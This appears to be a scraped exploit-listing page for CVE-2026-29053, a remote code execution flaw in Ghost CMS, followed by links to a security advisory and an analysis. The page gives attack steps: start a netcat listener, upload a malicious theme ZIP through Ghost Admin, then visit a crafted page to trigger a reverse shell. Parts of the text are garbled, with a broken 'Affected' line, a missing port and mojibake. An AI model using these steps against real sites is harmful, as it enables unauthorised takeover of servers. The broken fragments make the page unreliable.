Share
## https://sploitus.com/exploit?id=2A7C0BF5-FDCE-5B2C-86F5-943D06D13B64
# CVE-2026-29053

Ghost CMS RCE via jsonpath/static-eval prototype chain.


## Info

- **CVE**: CVE-2026-29053
- **Affected**: Ghost  -p 
```

1. Start listener: `nc -lvnp `
2. Upload `malicious-theme.zip` to Ghost Admin โ†’ Settings โ†’ Design
3. Create page with slug `rce`
4. Visit `/rce/`

## References

- https://github.com/TryGhost/Ghost/security/advisories/GHSA-cgc2-rcrh-qr5x
- https://www.endorlabs.com/learn/rce-in-ghost-cms-ghsa-cgc2-rcrh-qr5x